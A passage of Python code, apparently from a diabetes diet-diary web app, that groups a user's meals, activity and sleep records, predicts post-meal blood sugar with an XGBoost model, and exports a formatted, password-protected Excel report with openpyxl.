'Продукт', 'Масса, гр',
'Углеводы, гр',
'Белки, гр', 'Жиры, гр',
'ККал',
'Микроэлементы', 'Вода, в г',
'МДС, в г',
'Крахмал, в г', 'Пищ вол, в г',
'Орган кислота, в г',
'Зола, в г',
'Натрий, в мг', 'Калий, в мг',
'Кальций, в мг',
'Магний, в мг', 'Фосфор, в мг',
'Железо, в мг',
'Ретинол, в мкг',
'Каротин, в мкг',
'Ретин экв, в мкг',
'Тиамин, в мг',
'Рибофлавин, в мг',
'Ниацин, в мг',
'Аскорб кисл, в мг',
'Холестерин, в мг',
'НЖК, в г',
'Ниационвый эквивалент, в мг',
'Токоферол эквивалент, в мг',
'Гликемический индекс'])
list_of = ['Масса, гр', 'Углеводы, гр',
'Белки, гр', 'Жиры, гр',
'ККал', 'Микроэлементы', 'Вода, в г', 'МДС, в г',
'Крахмал, в г', 'Пищ вол, в г',
'Орган кислота, в г', 'Зола, в г',
'Натрий, в мг', 'Калий, в мг', 'Кальций, в мг',
'Магний, в мг', 'Фосфор, в мг', 'Железо, в мг',
'Ретинол, в мкг', 'Каротин, в мкг',
'Ретин экв, в мкг', 'Тиамин, в мг',
'Рибофлавин, в мг',
'Ниацин, в мг', 'Аскорб кисл, в мг',
'Холестерин, в мг',
'НЖК, в г',
'Ниационвый эквивалент, в мг',
'Токоферол эквивалент, в мг',
'Гликемический индекс']
for name1 in list_of:
for i in range(len(food_weight[name1])):
food_weight[name1][i] = \
food_weight[name1][i].replace('.', ',') + '\t'
a = \
food_weight.groupby(
['Дата',
'Время',
'Прием пищи']).agg({
"Продукт": lambda tags: '\n'.join(tags),
"Масса, гр": lambda tags: '\n'.join(tags),
"Углеводы, гр": lambda tags:
'\n'.join(tags),
"Белки, гр": lambda tags: '\n'.join(tags),
"Жиры, гр": lambda tags: '\n'.join(tags),
"ККал": lambda tags: '\n'.join(tags),
"Микроэлементы": lambda tags:
'\n'.join(tags),
"Вода, в г": lambda tags: '\n'.join(tags),
"МДС, в г": lambda tags: '\n'.join(tags),
"Крахмал, в г": lambda tags:
'\n'.join(tags),
"Пищ вол, в г": lambda tags:
'\n'.join(tags),
"Орган кислота, в г": lambda tags:
'\n'.join(tags),
"Зола, в г": lambda tags:
'\n'.join(tags),
"Натрий, в мг": lambda tags:
'\n'.join(tags),
"Калий, в мг": lambda tags:
'\n'.join(tags),
"Кальций, в мг": lambda tags:
'\n'.join(tags),
"Магний, в мг": lambda tags:
'\n'.join(tags),
"Фосфор, в мг": lambda tags:
'\n'.join(tags),
"Железо, в мг": lambda tags:
'\n'.join(tags),
"Ретинол, в мкг": lambda tags:
'\n'.join(tags),
"Каротин, в мкг": lambda tags:
'\n'.join(tags),
"Ретин экв, в мкг": lambda tags:
'\n'.join(tags),
"Тиамин, в мг": lambda tags:
'\n'.join(tags),
"Рибофлавин, в мг": lambda tags:
'\n'.join(tags),
"Ниацин, в мг": lambda tags:
'\n'.join(tags),
"Аскорб кисл, в мг": lambda tags:
'\n'.join(tags),
"Холестерин, в мг": lambda tags:
'\n'.join(tags),
"НЖК, в г": lambda tags:
'\n'.join(tags),
"Ниационвый эквивалент, в мг":
lambda tags: '\n'.join(tags),
"Токоферол эквивалент, в мг": lambda tags:
'\n'.join(tags),
"Гликемический индекс": lambda tags:
'\n'.join(tags)}).reset_index()
a["Дата1"] = \
pd.to_datetime(a['Дата'], format='%d.%m.%Y')
a = a.sort_values(by="Дата1")
a = a.drop(["Дата1"], axis=1)
# Добавляем нумерацию блюд
for i1 in range(len(a['Продукт'])):
row = a['Продукт'][i1].split('\n')
for i in range(len(row)):
row[i] = f'{i + 1}. ' + row[i]
row = '\n'.join(row)
a['Продукт'][i1] = row
if len(a['Продукт']) == 0:
a = pd.DataFrame({'Дата': [''], 'Время': [''], 'Прием пищи': [''],
'Продукт': [''],
'Масса, гр': [''], 'Углеводы, гр': [''],
'Белки, гр': [''], 'Жиры, гр': [''],
'ККал': [''], 'Микроэлементы': [''],
'Вода, в г': [''], 'МДС, в г': [''],
'Крахмал, в г': [''], 'Пищ вол, в г': [''],
'Орган кислота, в г': [''],
'Зола, в г': [''], 'Натрий, в мг': [''],
'Калий, в мг': [''], 'Кальций, в мг': [''],
'Магний, в мг': [''], 'Фосфор, в мг': [''],
'Железо, в мг': [''], 'Ретинол, в мкг': [''],
'Каротин, в мкг': [''],
'Ретин экв, в мкг': [''],
'Тиамин, в мг': [''],
'Рибофлавин, в мг': [''], 'Ниацин, в мг': [''],
'Аскорб кисл, в мг': [''],
'Холестерин, в мг': [''], 'НЖК, в г': [''],
'Ниациновый эквивалент, в мг': [''],
'Токоферол эквивалент, в мг': [''],
'Гликемический индекс': ['']})
# Физическая активность
activity1 = pd.DataFrame(L1, columns=['Дата', 'Время',
'Длительность, мин.',
'Тип нагрузки', 'Пустое'])
activity2 = activity1.groupby(['Дата']).agg({
'Время': lambda tags: '\n'.join(tags),
'Длительность, мин.': lambda tags: '\n'.join(tags),
'Тип нагрузки': lambda tags: '\n'.join(tags),
'Пустое': lambda tags: '\n'.join(tags)})
# Сон
sleep1 = pd.DataFrame(L2, columns=['Дата', 'Время',
'Длительность, ч.'])
sleep2 = \
sleep1.groupby(
['Дата']).agg({'Время': lambda tags: '\n'.join(tags),
'Длительность, ч.': lambda tags: '\n'.join(tags)})
luck = pd.merge(left=activity2,
right=sleep2,
on="Дата", how='outer')
luck["Дата1"] = pd.to_datetime(luck.index, format='%d.%m.%Y')
luck = luck.sort_values(by="Дата1")
if len(luck.index) > 0:
start1 = luck.index[0]
end1 = luck.index[len(luck.index) - 1]
start1 = datetime.datetime.strptime(start1, '%d.%m.%Y')
end1 = datetime.datetime.strptime(end1, '%d.%m.%Y')
start1 = start1.strftime('%m/%d/%Y')
end1 = end1.strftime('%m/%d/%Y')
luck = luck.drop(["Дата1"], axis=1)
ranges = pd.date_range(start=start1, end=end1)
ranges1 = ranges.to_pydatetime()
new_ranges = []
for i in range(len(ranges1)):
new_ranges.append(ranges1[i].strftime('%d.%m.%Y'))
luck = luck.reindex(new_ranges)
else:
luck = luck.drop(["Дата1"], axis=1)
# Список полных дней
full_days1 = pd.DataFrame(full_days, columns=['Дата'])
full_days1['Дата1'] = pd.to_datetime(full_days1['Дата'],
format='%d.%m.%Y')
full_days1 = full_days1.sort_values(by='Дата1')
full_days1 = full_days1.drop(['Дата1'], axis=1)
# Список удаленных записей
delet_ed = pd.DataFrame(deleted, columns=['id', 'Дата', 'Время', 'Тип',
'Подробности'])
delet_ed = delet_ed.drop(['id'], axis=1)
delet_ed['Дата1'] = pd.to_datetime(delet_ed['Дата'], format='%d.%m.%Y')
delet_ed = delet_ed.sort_values(by='Дата1')
delet_ed = delet_ed.drop(['Дата1'], axis=1)
# Предсказываем сахар
tb = pd.DataFrame(tb, columns=['date', 'time', 'types_food_n', 'BG0',
'GI', 'carbo', 'prot', 'kr'])
tb['GI'] = pd.to_numeric(tb['GI'], downcast='float')
tb['carbo'] = pd.to_numeric(tb['carbo'], downcast='float')
tb['prot'] = pd.to_numeric(tb['prot'], downcast='float')
tb['kr'] = pd.to_numeric(tb['kr'], downcast='float')
tb['BG0'] = pd.to_numeric(tb['BG0'], downcast='float')
tb = tb.groupby(['date', 'time', 'types_food_n', 'BG0'],
as_index=False).sum()
tb['GL'] = tb['GI']*tb['carbo']/100
tb['DateTime'] = tb['date'] + ' ' + tb['time']
tb['DateTime'] = pd.to_datetime(tb['DateTime'], format='%d.%m.%Y %H:%M')
tb = tb.drop(['date', 'time', 'GI'], axis=1)
prot = list()
for i in range(len(tb['DateTime'])):
start_date = tb['DateTime'][i]
mask = (tb['DateTime']
<= start_date) & (tb['DateTime']
>= (start_date
- pd.Timedelta(value=6, unit='h')))
prot_b6h = tb.loc[mask]['prot'].aggregate(np.sum)
prot.append(prot_b6h)
tb.insert(7, 'prot_b6h', prot, True)
tb = tb.drop(['prot'], axis=1)
BMI = list()
for i in range(len(tb['DateTime'])):
BMI.append(BMI0)
if tb['types_food_n'][i] == 'Завтрак':
tb['types_food_n'][i] = 1
elif tb['types_food_n'][i] == 'Обед':
tb['types_food_n'][i] = 2
elif tb['types_food_n'][i] == 'Ужин':
tb['types_food_n'][i] = 3
else:
tb['types_food_n'][i] = 4
tb.insert(7, 'BMI', BMI, True)
tb = tb.reindex(columns=["DateTime", "BG0", "GL", "carbo", "prot_b6h",
"types_food_n", "kr", "BMI"])
predict = list()
for i in range(len(tb['DateTime'])):
best_model = xgb.Booster()
best_model.load_model(model)
core_features = ["BG0", "gl", "carbo",
"prot_b6h", "types_food_n", "kr", "BMI"]
X_test = [tb.iloc[i, 1:7].values.tolist()]
predicted = best_model.predict(xgb.DMatrix(np.array(X_test)))
predict.append(predicted[0])
tb.insert(3, 'Предсказанный сахар после', predict, True)
date3 = list()
time3 = list()
tb['Прием пищи'] = tb['types_food_n']
for i in range(len(tb['DateTime'])):
date3.append(tb['DateTime'][i].strftime('%d.%m.%Y'))
time3.append(tb['DateTime'][i].strftime('%H:%m'))
if tb['Прием пищи'][i] == 1:
tb['Прием пищи'][i] = 'Завтрак'
elif tb['Прием пищи'][i] == 2:
tb['Прием пищи'][i] = 'Обед'
elif tb['Прием пищи'][i] == 3:
tb['Прием пищи'][i] = 'Ужин'
else:
tb['Прием пищи'][i] = 'Перекус'
tb.insert(0, 'Дата', date3, True)
tb.insert(1, 'Время', time3, True)
tb = tb.drop(['DateTime'], axis=1)
tb = tb.drop(['types_food_n'], axis=1)
tb['Сахар до'] = tb['BG0']
tb = tb.drop(['BG0'], axis=1)
tb['Гликемическая нагрузка'] = tb['GL']
tb = tb.drop(['GL'], axis=1)
tb = tb.drop(['carbo'], axis=1)
tb = tb.drop(['prot_b6h'], axis=1)
tb = tb.drop(['kr'], axis=1)
tb = tb.drop(["BMI"], axis=1)
tb = tb[['Дата', 'Время', 'Прием пищи', 'Сахар до',
'Предсказанный сахар после', 'Гликемическая нагрузка']]
# Создаем общий Excel файл
dirname = os.path.dirname(__file__)
filename = os.path.join(dirname, '%s.xlsx' % session["username"])
writer = pd.ExcelWriter(filename,
engine='xlsxwriter',
options={'strings_to_numbers': True,
'default_date_format': 'dd/mm/yy'})
a.to_excel(writer, sheet_name='Приемы пищи', startrow=0, startcol=0)
tb.to_excel(writer, sheet_name='Предсказание сахара',
startrow=0, startcol=0)
luck.to_excel(writer, sheet_name='Физическая нагрузка и сон',
startrow=0, startcol=1)
full_days1.to_excel(writer, sheet_name='Список полных дней',
startrow=2, startcol=-1)
delet_ed.to_excel(writer, sheet_name='Удаленные записи',
startrow=2, startcol=-1, header=False)
writer.close()
# Редактируем оформление приемов пищи
wb = openpyxl.load_workbook(filename)
sheet = wb['Приемы пищи']
ws = wb.active
for row in ws.iter_rows():
for cell in row:
cell.alignment = cell.alignment.copy(wrapText=True)
cell.alignment = cell.alignment.copy(vertical='center')
for b in ['F', 'G', 'H', 'I', 'J', 'L', 'M', 'N', 'O', 'P', 'Q', 'R',
'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
'AA', 'AB', 'AC', 'AD', 'AE', 'AF', 'AG', 'AH', 'AI']:
for i in range(2, (len(a['Микроэлементы']) + 2)):
k = i
cs = sheet['%s' % b + str(k)]
cs.alignment = cs.alignment.copy(horizontal='left')
for c in ['B', 'C', 'D']:
for i in range(2, (len(a['Микроэлементы']) + 2)):
k = i
cs = sheet['%s' % c + str(k)]
cs.alignment = cs.alignment.copy(horizontal='center')
sheet.column_dimensions['A'].width = 20
sheet.column_dimensions['B'].width = 10
sheet.column_dimensions['C'].width = 10
sheet.column_dimensions['D'].width = 16
sheet.column_dimensions['E'].width = 50
sheet.column_dimensions['F'].width = 13
sheet.column_dimensions['G'].width = 20
sheet.column_dimensions['H'].width = 20
sheet.column_dimensions['I'].width = 20
sheet.column_dimensions['J'].width = 20
sheet.column_dimensions['K'].width = 20
sheet.column_dimensions['L'].width = 20
sheet.column_dimensions['M'].width = 20
sheet.column_dimensions['N'].width = 20
sheet.column_dimensions['O'].width = 20
sheet.column_dimensions['P'].width = 20
sheet.column_dimensions['R'].width = 20
sheet.column_dimensions['S'].width = 20
sheet.column_dimensions['T'].width = 20
sheet.column_dimensions['O'].width = 20
sheet.column_dimensions['U'].width = 20
sheet.column_dimensions['V'].width = 20
sheet.column_dimensions['W'].width = 20
sheet.column_dimensions['X'].width = 20
sheet.column_dimensions['Y'].width = 20
sheet.column_dimensions['Z'].width = 20
sheet.column_dimensions['Q'].width = 20
sheet.column_dimensions['AA'].width = 20
sheet.column_dimensions['AB'].width = 20
sheet.column_dimensions['AC'].width = 20
sheet.column_dimensions['AD'].width = 20
sheet.column_dimensions['AE'].width = 20
sheet.column_dimensions['AF'].width = 20
sheet.column_dimensions['AG'].width = 30
sheet.column_dimensions['AH'].width = 30
sheet.column_dimensions['AI'].width = 23
b1 = ws['B1']
b1.fill = PatternFill("solid", fgColor="fafad2")
c1 = ws['C1']
c1.fill = PatternFill("solid", fgColor="fafad2")
d1 = ws['D1']
d1.fill = PatternFill("solid", fgColor="fafad2")
e1 = ws['E1']
e1.fill = PatternFill("solid", fgColor="fafad2")
f1 = ws['F1']
f1.fill = PatternFill("solid", fgColor="fafad2")
g1 = ws['G1']
g1.fill = PatternFill("solid", fgColor="fafad2")
h1 = ws['H1']
h1.fill = PatternFill("solid", fgColor="fafad2")
i1 = ws['I1']
i1.fill = PatternFill("solid", fgColor="fafad2")
j1 = ws['J1']
j1.fill = PatternFill("solid", fgColor="fafad2")
m1 = ws['M1']
m1.fill = PatternFill("solid", fgColor="fafad2")
n1 = ws['N1']
n1.fill = PatternFill("solid", fgColor="fafad2")
o1 = ws['O1']
o1.fill = PatternFill("solid", fgColor="fafad2")
p1 = ws['P1']
p1.fill = PatternFill("solid", fgColor="fafad2")
q1 = ws['Q1']
q1.fill = PatternFill("solid", fgColor="fafad2")
r1 = ws['R1']
r1.fill = PatternFill("solid", fgColor="fafad2")
s1 = ws['S1']
s1.fill = PatternFill("solid", fgColor="fafad2")
t1 = ws['T1']
t1.fill = PatternFill("solid", fgColor="fafad2")
u1 = ws['U1']
u1.fill = PatternFill("solid", fgColor="fafad2")
v1 = ws['V1']
v1.fill = PatternFill("solid", fgColor="fafad2")
w1 = ws['W1']
w1.fill = PatternFill("solid", fgColor="fafad2")
x1 = ws['X1']
x1.fill = PatternFill("solid", fgColor="fafad2")
y1 = ws['Y1']
y1.fill = PatternFill("solid", fgColor="fafad2")
z1 = ws['Z1']
z1.fill = PatternFill("solid", fgColor="fafad2")
aa1 = ws['AA1']
aa1.fill = PatternFill("solid", fgColor="fafad2")
ab1 = ws['AB1']
ab1.fill = PatternFill("solid", fgColor="fafad2")
ac1 = ws['AC1']
ac1.fill = PatternFill("solid", fgColor="fafad2")
ad1 = ws['AD1']
ad1.fill = PatternFill("solid", fgColor="fafad2")
ae1 = ws['AE1']
ae1.fill = PatternFill("solid", fgColor="fafad2")
af1 = ws['AF1']
af1.fill = PatternFill("solid", fgColor="fafad2")
ah1 = ws['AH1']
ah1.fill = PatternFill("solid", fgColor="fafad2")
ag1 = ws['AG1']
ag1.fill = PatternFill("solid", fgColor="fafad2")
ws['AH1'].fill = PatternFill("solid", fgColor="fafad2")
ws['L1'].fill = PatternFill("solid", fgColor="fafad2")
ws['AI1'].fill = PatternFill("solid", fgColor="fafad2")
i = 1
for num in range(1, len(a['Микроэлементы']) + 1):
if ws[f'B{num + 1}'].value != ws[f'B{num}'].value:
if i % 2 == 0:
ws[f'B{num + 1}'].fill = \
PatternFill("solid", fgColor="f0f8ff")
i = i + 1
else:
ws[f'B{num + 1}'].fill = \
PatternFill("solid", fgColor="f0fff0")
i = i + 1
else:
ws[f'B{num + 1}']._style = ws[f'B{num}']._style
for i in ["C", "D", "E", "F", "G", "H", "I", "J", 'L', 'M', 'N', 'O',
'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W',
'X', 'Y', 'Z', 'AA', 'AB', 'AC', 'AD', 'AE', 'AF',
'AG', 'AH', 'AI']:
for num in range(1, len(a['Микроэлементы']) + 2):
cell = ws[f'B{num}']
ws[f'{i}{num}'].fill = \
PatternFill("solid", fgColor=cell.fill.start_color.index)
thin_border = Border(left=Side(style='hair'),
right=Side(style='hair'),
top=Side(style='hair'),
bottom=Side(style='hair'))
no_border = Border(left=Side(border_style=None),
right=Side(border_style=None),
top=Side(border_style=None),
bottom=Side(border_style=None))
for row in ws.iter_rows():
for cell in row:
cell.border = thin_border
merged_cells_range = ws.merged_cells.ranges
for merged_cell in merged_cells_range:
merged_cell.shift(0, 2)
ws.insert_rows(1, 2)
# Разделяем основные показатели и микроэлементы
ws['K3'].value = ''
for i in range(len(a['Микроэлементы']) + 3):
i1 = str(i + 1)
ws[f'K{i1}'].border = no_border
# Убираем форматирование первого столбца A1 и последнего AI
for i in range(len(a['Микроэлементы']) + 3):
i1 = str(i + 1)
ws[f'A{i1}'].border = no_border
ws[f'A{i1}'].value = ''
# Оформляем верхушки
ws['A2'] = 'Приемы пищи'
ws['A1'] = '%s' % fio[0][0]
sheet.merge_cells('A1:AI1')
ws['A2'].border = thin_border
ws['A2'].fill = PatternFill("solid", fgColor="fafad2")
ws['A2'].font = Font(bold=True)
sheet.merge_cells('A2:AI2')
length2 = str(len(a['Микроэлементы']) + 5)
length3 = str(len(a['Микроэлементы']) + 6)
sheet.merge_cells('C%s:E%s' % (length3, length3))
ws['A%s' % length2] = 'Срденее по дням'
ws['A%s' % length2].font = Font(bold=True)
ws['B%s' % length3] = 'Дата'
ws['B%s' % length3].font = Font(bold=True)
ws['A%s' % length2].border = thin_border
ws['A%s' % length2].fill = PatternFill("solid", fgColor="fafad2")
ws['B%s' % length3].border = thin_border
ws['B%s' % length3].fill = PatternFill("solid", fgColor="fafad2")
ws['C%s' % length3].border = thin_border
ws['C%s' % length3].fill = PatternFill("solid", fgColor="fafad2")
# Проставляем внизу для средних по дням те же наименования,
# что и сверху
mean21 = ['Масса, гр', 'Углеводы, гр',
'Белки, гр', 'Жиры, гр',
'ККал', '', 'Вода, в г', 'МДС, в г',
'Крахмал, в г', 'Пищ вол, в г',
'Орган кислота, в г', 'Зола, в г',
'Натрий, в мг', 'Калий, в мг', 'Кальций, в мг',
'Магний, в мг', 'Фосфор, в мг', 'Железо, в мг',
'Ретинол, в мкг', 'Каротин, в мкг',
'Ретин экв, в мкг', 'Тиамин, в мг',
'Рибофлавин, в мг',
'Ниацин, в мг', 'Аскорб кисл, в мг',
'Холестерин, в мг',
'НЖК, в г',
'Ниационвый эквивалент, в мг',
'Токоферол эквивалент, в мг',
'Гликемический индекс']
i = 0
for c in ['F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q',
'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
'Z', 'AA', 'AB', 'AC', 'AD', 'AE', 'AF', 'AG', 'AH', 'AI']:
ws[f'{c}%s' % length3] = mean21[i]
ws[f'{c}%s' % length3].border = thin_border
ws[f'{c}%s' % length3].fill = \
PatternFill("solid", fgColor="fafad2")
ws[f'{c}%s' % length3].font = Font(bold=True)
i = i + 1
# Убираем закрашенные клетки пустого столбца K
length5 = str(len(a['Микроэлементы']) + 8 + len(date))
ws['K%s' % length3]._style = copy(ws['K%s' % length5]._style)
ws['K%s' % length3].border = no_border
# Выводим скользящее среднее
date1 = []
for i in range(len(date)):
date1.append(date[i][0])
date2 = pd.DataFrame({'Дата': date1})
date2['Дата1'] = pd.to_datetime(date2['Дата'], format='%d.%m.%Y')
date2 = date2.sort_values(by=['Дата1'])
date2 = date2.drop('Дата1', axis=1)
date = date2.values.tolist()
path = os.path.dirname(os.path.abspath(__file__))
db_16 = os.path.join(path, 'diacompanion.db')
con = sqlite3.connect(db_16)
cur = con.cursor()
i = 7
for d in date:
sheet['B%s' % str(len(a['Микроэлементы']) + i)] = d[0]
cur.execute('''SELECT avg(libra), avg(carbo), avg(prot), avg(fat),
avg(energy), avg(water), avg(mds),
avg(kr), avg(pv), avg(ok), avg(zola), avg(na),
avg(k), avg(ca), avg(mg), avg(p), avg(fe),
avg(a), avg(kar), avg(re), avg(b1), avg(b2),
avg(rr), avg(c), avg(hol), avg(nzhk), avg(ne),
avg(te), avg(gi) FROM favourites
WHERE user_id = ?
AND date = ? ''', (session['user_id'], d[0]))
avg = cur.fetchall()
sheet['F%s' % str(len(a['Микроэлементы']) + i)] = avg[0][0]
sheet['G%s' % str(len(a['Микроэлементы']) + i)] = avg[0][1]
sheet['H%s' % str(len(a['Микроэлементы']) + i)] = avg[0][2]
sheet['I%s' % str(len(a['Микроэлементы']) + i)] = avg[0][3]
sheet['J%s' % str(len(a['Микроэлементы']) + i)] = avg[0][4]
sheet['L%s' % str(len(a['Микроэлементы']) + i)] = avg[0][5]
sheet['M%s' % str(len(a['Микроэлементы']) + i)] = avg[0][6]
sheet['N%s' % str(len(a['Микроэлементы']) + i)] = avg[0][7]
sheet['O%s' % str(len(a['Микроэлементы']) + i)] = avg[0][8]
sheet['P%s' % str(len(a['Микроэлементы']) + i)] = avg[0][9]
sheet['Q%s' % str(len(a['Микроэлементы']) + i)] = avg[0][10]
sheet['R%s' % str(len(a['Микроэлементы']) + i)] = avg[0][11]
sheet['S%s' % str(len(a['Микроэлементы']) + i)] = avg[0][12]
sheet['T%s' % str(len(a['Микроэлементы']) + i)] = avg[0][13]
sheet['U%s' % str(len(a['Микроэлементы']) + i)] = avg[0][14]
sheet['V%s' % str(len(a['Микроэлементы']) + i)] = avg[0][15]
sheet['W%s' % str(len(a['Микроэлементы']) + i)] = avg[0][16]
sheet['X%s' % str(len(a['Микроэлементы']) + i)] = avg[0][17]
sheet['Y%s' % str(len(a['Микроэлементы']) + i)] = avg[0][18]
sheet['Z%s' % str(len(a['Микроэлементы']) + i)] = avg[0][19]
sheet['AA%s' % str(len(a['Микроэлементы']) + i)] = avg[0][20]
sheet['AB%s' % str(len(a['Микроэлементы']) + i)] = avg[0][21]
sheet['AC%s' % str(len(a['Микроэлементы']) + i)] = avg[0][22]
sheet['AD%s' % str(len(a['Микроэлементы']) + i)] = avg[0][23]
sheet['AE%s' % str(len(a['Микроэлементы']) + i)] = avg[0][24]
sheet['AF%s' % str(len(a['Микроэлементы']) + i)] = avg[0][25]
sheet['AG%s' % str(len(a['Микроэлементы']) + i)] = avg[0][26]
sheet['AH%s' % str(len(a['Микроэлементы']) + i)] = avg[0][27]
sheet['AI%s' % str(len(a['Микроэлементы']) + i)] = avg[0][28]
i = i + 1
con.close()
# Выравниваем скользящее среднее по левому краю
length31 = len(a['Микроэлементы']) + 7
length4 = len(a['Микроэлементы']) + 7 + len(date)
for a in ['F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q',
'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
'Z', 'AA', 'AB', 'AC', 'AD', 'AE', 'AF', 'AG', 'AH', 'AI']:
for i in range(length31, length4):
sheet[f'{a}{i}'].alignment = \
sheet[f'{a}{i}'].alignment.copy(horizontal='left')
for a in ['B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',
'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U',
'V', 'W', 'X', 'Y', 'Z', 'AA', 'AB', 'AC', 'AD', 'AE', 'AF',
'AG', 'AH', 'AI']:
sheet[f'{a}3'].alignment = \
sheet[f'{a}3'].alignment.copy(horizontal='left')
ws.protection.set_password('test')
wb.save(filename)
wb.close()
# Форматируем физическую активность как надо
wb = openpyxl.load_workbook(filename)
sheet1 = wb['Физическая нагрузка и сон']
for row in sheet1.iter_rows():
for cell in row:
cell.alignment = cell.alignment.copy(wrapText=True)
cell.alignment = cell.alignment.copy(vertical='center')
cell.alignment = cell.alignment.copy(horizontal='left')
for row in sheet1.iter_rows():
for cell in row:
cell.border = thin_border
merged_cells_range = sheet1.merged_cells.ranges
for merged_cell in merged_cells_range:
merged_cell.shift(0, 2)
sheet1.insert_rows(1, 2)
sheet1['A1'] = '%s' % fio[0][0]
sheet1['A2'] = 'Физическая нагрузка'
sheet1['G2'] = 'Сон'
sheet1.merge_cells('A1:H1')
sheet1.column_dimensions['A'].width = 25
sheet1.column_dimensions['B'].width = 13
sheet1.column_dimensions['C'].width = 13
sheet1.column_dimensions['D'].width = 20
sheet1.column_dimensions['E'].width = 25
sheet1.column_dimensions['F'].width = 13
sheet1.column_dimensions['G'].width = 13
sheet1.column_dimensions['H'].width = 20
b1 = sheet1['B3']
b1.fill = PatternFill("solid", fgColor="fafad2")
c1 = sheet1['C3']
c1.fill = PatternFill("solid", fgColor="fafad2")
d1 = sheet1['D3']
d1.fill = PatternFill("solid", fgColor="fafad2")
e1 = sheet1['E3']
e1.fill = PatternFill("solid", fgColor="fafad2")
g1 = sheet1['G3']
g1.fill = PatternFill("solid", fgColor="fafad2")
sheet1['H3'].fill = PatternFill("solid", fgColor="fafad2")
# Разделяем физическую нагрузку и сон, также убираем форматирование
# с первого столбца A1
# убираем мелкие дефекты
sheet1['F3'].value = ''
sheet1['C3'].value = 'Время'
sheet1['G3'].value = 'Время'
for i in range(3, len(luck['Длительность, ч.']) + 4):
i1 = str(i)
sheet1[f'F{i1}'].border = no_border
for i in range(3, len(luck['Длительность, ч.']) + 4):
i1 = str(i)
sheet1[f'A{i1}'].border = no_border
# Корректируем верхушки
sheet1['A2'].fill = PatternFill("solid", fgColor="fafad2")
sheet1['G2'].fill = PatternFill("solid", fgColor="fafad2")
sheet1['A2'].border = thin_border
sheet1['G2'].border = thin_border
sheet1['A2'].font = Font(bold=True)
sheet1['G2'].font = Font(bold=True)
for i in range(4, len(luck['Время_x']) + 4):
sheet1[f'B{i}'].font = Font(bold=False)
# Закрашиваем строки через одну
k = 1
for i in range(4, len(luck['Длительность, ч.']) + 4):
if k % 2 == 0:
sheet1[f'B{i}'].fill = PatternFill('solid', fgColor='f0f8ff')
k = k + 1
else:
sheet1[f'B{i}'].fill = PatternFill('solid', fgColor='f0fff0')
k = k + 1
for i in ["C", "D", "E", "G", "H"]:
for num in range(4, len(luck['Длительность, ч.']) + 4):
cell = sheet1[f'B{num}']
sheet1[f'{i}{num}'].fill = \
PatternFill("solid", fgColor=cell.fill.start_color.index)
sheet1.protection.set_password('test')
wb.save(filename)
wb.close()
# Форматируем список полных дней
wb = openpyxl.load_workbook(filename)
sheet2 = wb['Список полных дней']
for row in sheet2.iter_rows():
for cell in row:
cell.alignment = cell.alignment.copy(wrapText=True)
cell.alignment = cell.alignment.copy(vertical='center')
cell.alignment = cell.alignment.copy(horizontal='left')
cell.border = thin_border
sheet2['A1'] = '%s' % fio[0][0]
sheet2['A1'].border = no_border
sheet2['A2'] = 'Список полных дней'
sheet2.column_dimensions['A'].width = 25
sheet2['A2'].fill = PatternFill("solid", fgColor="fafad2")
sheet2['A3'].fill = PatternFill("solid", fgColor="fafad2")
sheet2['A2'].font = Font(bold=True)
sheet2['A3'].font = Font(bold=True)
sheet2.protection.set_password('test')
wb.save(filename)
wb.close()
# Форматируем удаленные записи
wb = openpyxl.load_workbook(filename)
sheet3 = wb['Удаленные записи']
sheet3["A1"] = '%s' % fio[0][0]
sheet3["A2"].value = 'Удаленные записи'
sheet3["A2"].font = Font(bold=True)
sheet3["A2"].border = thin_border
sheet3["A2"].fill = PatternFill('solid', fgColor='fafad2')
sheet3.column_dimensions['A'].width = 25
sheet3.column_dimensions['B'].width = 10
sheet3.column_dimensions['C'].width = 30
sheet3.column_dimensions['D'].width = 25
sheet3.protection.set_password('test')
wb.save(filename)
wb.close()
# Форматируем предсказание сахара
wb = openpyxl.load_workbook(filename)
sheet4 = wb['Предсказание сахара']
for row in sheet4.iter_rows():
for cell in row:
cell.alignment = cell.alignment.copy(wrapText=True)
cell.alignment = cell.alignment.copy(vertical='center')
for b in ["B", "C", "D", "E", "F", "G"]:
for i in range(1, (len(tb['Прием пищи']) + 2)):
k = i
cs = sheet4['%s' % b + str(k)]
cs.alignment = cs.alignment.copy(horizontal='left')
sheet4.column_dimensions['B'].width = 15
sheet4.column_dimensions['C'].width = 15
sheet4.column_dimensions['D'].width = 15
sheet4.column_dimensions['E'].width = 15
sheet4.column_dimensions['F'].width = 30
sheet4.column_dimensions['G'].width = 25
sheet4['B1'].fill = PatternFill("solid", fgColor="fafad2")
sheet4['C1'].fill = PatternFill("solid", fgColor="fafad2")
sheet4['D1'].fill = PatternFill("solid", fgColor="fafad2")
sheet4['E1'].fill = PatternFill("solid", fgColor="fafad2")
sheet4['F1'].fill = PatternFill("solid", fgColor="fafad2")
sheet4['G1'].fill = PatternFill("solid", fgColor="fafad2")
i = 1
for num in range(1, len(tb['Прием пищи']) + 1):
if sheet4[f'B{num + 1}'].value != sheet4[f'B{num}'].value:
if i % 2 == 0:
sheet4[f'B{num + 1}'].fill = \
PatternFill("solid", fgColor="f0f8ff")
i = i + 1
else:
sheet4[f'B{num + 1}'].fill = \
PatternFill("solid", fgColor="f0fff0")
i = i + 1
else:
sheet4[f'B{num + 1}']._style = sheet4[f'B{num}']._style
for i in ["C", "D", "E", "F", "G"]:
for num in range(2, len(tb['Прием пищи']) + 2):
cell = sheet4[f'B{num}']
sheet4[f'{i}{num}'].fill = \
PatternFill("solid", fgColor=cell.fill.start_color.index)
thin_border = Border(left=Side(style='hair'),
right=Side(style='hair'),
top=Side(style='hair'),
bottom=Side(style='hair'))
no_border = Border(left=Side(border_style=None),
right=Side(border_style=None),
top=Side(border_style=None),
bottom=Side(border_style=None))
for row in sheet4.iter_rows():
for cell in row:
cell.border = thin_border
for i in range(len(tb['Прием пищи']) + 3):
i1 = str(i + 1)
sheet4[f'A{i1}'].border = no_border
sheet4[f'A{i1}'].value = ''
